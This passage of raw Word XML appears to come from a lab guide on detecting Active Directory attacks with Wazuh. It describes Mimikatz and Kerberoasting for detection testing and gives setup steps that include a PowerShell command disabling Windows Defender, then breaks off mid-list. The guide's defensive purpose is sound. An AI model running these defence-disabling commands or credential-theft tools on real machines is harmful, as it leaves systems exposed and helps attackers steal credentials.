      <w:r w:rsidR="00577778">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Wazuh Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD538B5" w14:textId="0C434BAC" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7641B6F1" wp14:editId="10D577C5">
            <wp:extent cx="6637020" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18949133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1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7584F857" w14:textId="77777777" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE2A9FC" w14:textId="09381021" w:rsidR="0011181E" w:rsidRPr="00AC61CB" w:rsidRDefault="00FF0262" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000614D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Active Directory Attack Detection with Wazuh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661D7F2A" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262" w:rsidP="00FF0262">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A4542A" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262" w:rsidP="00FF0262">
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D9AEF" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Mimikatz is a tool used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>extract credentials from memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Windows environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796DAE31" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>It can simulate attacks like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC0993D" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>DCSync:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Queries domain controllers to steal password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC3BAB7" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Pass-the-Hash / Pass-the-Ticket:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses captured credentials to authenticate as users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DEB434" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262" w:rsidP="00FF0262">
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Utility in the lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B411CC" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Allows us to simulate realistic Active Directory attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121B8FF6" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Helps us test if Wazuh rules can detect credential theft, abnormal privilege escalation, or suspicious access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F03DBD0" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262" w:rsidP="00FF0262">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F12FDC" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262" w:rsidP="00FF0262">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberoast Attack Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C5E031" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262" w:rsidP="00FF0262">
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62368666" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> targets service accounts in Active Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CEE5A6" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The attacker requests a service ticket for a user account, extracts it, and attempts offline password cracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4CEF09" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262" w:rsidP="00FF0262">
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Utility in the lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B3564" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Simulates one of the most common AD attacks in real enterprises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC0064" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Lets us check whether Wazuh can detect suspicious ticket requests or abnormal Kerberos activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1267C59C" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:t>Requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214BDE0" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Python for running tgsrepcrack.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C509CC" w14:textId="77777777" w:rsidR="00FF0262" w:rsidRPr="00FF0262" w:rsidRDefault="00FF0262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0262">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A list of potential passwords to crack (including the real password for the simulation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04070776" w14:textId="77777777" w:rsidR="0011181E" w:rsidRDefault="0011181E" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D59D95F" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3" w:rsidP="007E1ED3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4CA88" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3" w:rsidP="007E1ED3">
      <w:r w:rsidRPr="007E1ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0AA603" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Sysmon (System Monitor) is a Windows system service that </w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>logs detailed events</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1ED3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F9C6E" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED3">
        <w:t>Process creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3370EB8C" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED3">
        <w:t>Network connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E092D8F" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED3">
        <w:t>File modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125764F" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED3">
        <w:t>Registry changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65386061" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3" w:rsidP="007E1ED3">
      <w:r w:rsidRPr="007E1ED3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Utility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED66578" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Provides deep visibility into Windows activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FF8C94" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Wazuh collects Sysmon logs to detect sophisticated attacks that don’t trigger standard Windows security events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C0D765" w14:textId="77777777" w:rsidR="007E1ED3" w:rsidRPr="007E1ED3" w:rsidRDefault="007E1ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1ED3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Critical for detecting subtle attacks like Kerberoasting or Golden Ticket attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0959866A" w14:textId="77777777" w:rsidR="0011181E" w:rsidRDefault="0011181E" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BECDB2" w14:textId="6332DC82" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Prepare the Windows Endpoint for Attack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E60F17" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Make sure the Windows machine can run attack tools safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DDAEA2" w14:textId="413C8C43" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00AA177B" w:rsidP="00AA177B">
      <w:r w:rsidRPr="000614D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00077375" w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disable Windows Defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57816F6A" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:t>Open PowerShell as Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C2B4C" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:t>Run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135CAC4" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:t>Set-MpPreference -DisableRealtimeMonitoring $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B097F9" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:t>Verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2EBF8" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:t>Get-MpComputerStatus | Select-Object RealTimeProtectionEnabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE371FF" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:r w:rsidRPr="00077375">
        <w:t>It should return False.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C990281" w14:textId="38D1CE7F" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00AA177B" w:rsidP="00AA177B">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00077375" w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Install Defender Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6501D18C" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Download from a trusted source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D0DB07" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Run as Administrator and temporarily disable all Defender protections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7592142B" w14:textId="77777777" w:rsidR="004952CD" w:rsidRPr="00EC65FE" w:rsidRDefault="004952CD" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41EDD18E" w14:textId="050A41FC" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Step 2: Download and Prepare Attack Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8D1218" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00AA177B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFC16EF" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:t xml:space="preserve">Download from </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00077375">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>official GitHub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00077375">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B089E19" w14:textId="596A41E4" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Place binaries in a folder</w:t>
      </w:r>
      <w:r w:rsidR="00AA177B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\tools\Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECAD21F" w14:textId="77777777" w:rsidR="00CC52BE" w:rsidRPr="000614D0" w:rsidRDefault="00CC52BE" w:rsidP="00AA177B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A605A9" w14:textId="00E4A642" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00AA177B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203429C5" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Download the Kerberoast script from GitHub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C332A55" w14:textId="44C2FAFA" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Prepare a password list that includes the password of the target account</w:t>
      </w:r>
      <w:r w:rsidR="0085747F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> “passwords.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBC876" w14:textId="77777777" w:rsidR="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
